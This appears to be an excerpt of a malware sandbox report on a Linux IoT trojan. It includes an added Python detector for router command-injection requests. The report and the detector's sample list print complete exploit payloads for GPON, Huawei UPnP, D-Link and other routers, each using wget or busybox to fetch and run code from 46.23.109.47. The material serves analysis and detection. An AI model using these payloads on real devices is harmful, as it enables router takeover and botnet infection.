Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
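Every "Potential command found" and 'busybox' string above is the same pattern: a router web-interface parameter (ping target, login name, diagnostic host, UPnP status URL) carrying a shell separator followed by wget, optionally through busybox, then chmod and sh or ./ to run what was fetched, with the separators hidden behind %20, %27, + or backticks. The following is an added example, not part of the report and not code from the sample: a small detector that URL-decodes each request, flags the fetch-and-run chain, and pulls out the stage-2 URLs and download hosts as block-list candidates. The request strings in the list are the ones printed in the report; the list itself and the final benign control request are constructed for the example, and the regexes are this example's own, not a published signature.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus, urlsplit

# Request strings as they appear in the report's "Potential command found" and
# "String containing 'busybox'" entries. The list itself, and the final benign
# request used as a negative control, are constructed for this example.
SAMPLE_REQUESTS = [
    "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1",
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1",
    "GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1",
    "GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1",
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0",
    '<NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL>',
    "GET /ping.cgi?pingIpAddress=8.8.8.8&sessionKey=1039230114 HTTP/1.1",  # benign control
]

# A download tool invoked after a shell metacharacter, inside backticks or
# $(...), optionally through busybox. Matching on the decoded text is what
# defeats the %20 / + / %27 encoding of the separators.
FETCH_RE = re.compile(
    r"(?:^|[;|&`$(\s])(?:/bin/)?(?:busybox\s+)?(?P<tool>wget|curl|tftp)\b", re.I)
# First non-option argument of wget/curl: the stage-2 URL (scheme optional).
URL_RE = re.compile(
    r"\b(?:wget|curl)\s+(?:-\S*\s+)*(?P<url>(?:https?://)?[\w.\-]+(?::\d+)?/[^\s;'\"`&)]*)", re.I)
# Something that runs what was fetched: sh <file>, chmod <mode>, or ./<file>.
EXEC_RE = re.compile(r"(?:^|[;|&`$(\s])(?:sh\s|chmod\s|\./)", re.I)


def analyze_request(raw: str) -> dict | None:
    """Return a finding for a request carrying a fetch-and-run chain, else None."""
    decoded = unquote_plus(raw)  # one pass; double-encoded payloads would need a second
    fetch = FETCH_RE.search(decoded)
    if fetch is None:
        return None
    urls = [m.group("url") for m in URL_RE.finditer(decoded)]
    hosts = set()
    for u in urls:
        host = urlsplit(u if "://" in u else "http://" + u).hostname
        if host:
            hosts.add(host)
    return {
        "tool": fetch.group("tool").lower(),
        "executes": EXEC_RE.search(decoded) is not None,
        "urls": urls,
        "hosts": sorted(hosts),
        "decoded": decoded,
    }


def scan(requests: list[str]) -> list[dict]:
    """Findings for every flagged request, in input order."""
    return [f for f in (analyze_request(r) for r in requests) if f is not None]


def stage2_hosts(findings: list[dict]) -> set[str]:
    """Distinct download hosts across findings: the block-list candidates."""
    return {h for f in findings for h in f["hosts"]}


if __name__ == "__main__":
    found = scan(SAMPLE_REQUESTS)
    for f in found:
        print(f["tool"], "executes" if f["executes"] else "fetch-only", f["urls"])
    print("stage-2 hosts:", stage2_hosts(found))
```

Run against a web-server access log or a proxy capture, this flags all six exploit strings from the report and none of the benign ping, and reduces them to the single stage-2 host 46.23.109.47 that the report's URL list also shows. The decode-before-match step is the part worth keeping: a signature written against the raw `wget%20http` form misses the `+`-encoded GPON variant, and one written against `+wget+` misses the rest.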
Source: classification engine Classification label: mal76.troj.lin@0/0@0/0
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/6236/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1582/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2033/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2275/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/3088/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/6195/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/6194/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1612/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1579/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1699/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1335/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1698/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2028/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1334/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1576/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2302/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/3236/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2025/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2146/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/910/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/6227/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/912/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/517/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/759/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2307/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/918/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1594/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2285/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2281/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1349/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1623/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/761/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1622/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/884/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1983/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2038/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1344/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1465/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1586/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1463/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2156/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/800/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/801/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1629/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1627/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1900/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/3021/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/491/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2294/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2050/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1877/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/772/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1633/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1599/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1632/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/774/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1477/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/654/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/896/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1476/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1872/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2048/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/655/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1475/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2289/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/777/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/656/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/657/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/4466/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/658/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/4467/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/4468/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/4469/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/4502/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/419/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/936/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1639/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1638/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2208/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2180/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1809/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1494/exe
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1890/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2063/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2062/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1888/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1886/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/420/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1489/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/785/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1642/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/788/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/667/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/789/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/1648/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/4491/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/4498/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/6158/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2078/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2077/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2074/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2195/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/670/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/2746/exe Jump to behavior
Source: /tmp/tknjinyyHK (PID: 6236) File opened: /proc/793/exe Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: tknjinyyHK, type: SAMPLE
Source: Yara match File source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: tknjinyyHK, type: SAMPLE
Source: Yara match File source: 6235.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6237.1.0000000008048000.0000000008062000.r-x.sdmp, type: MEMORY
No contacted IP infos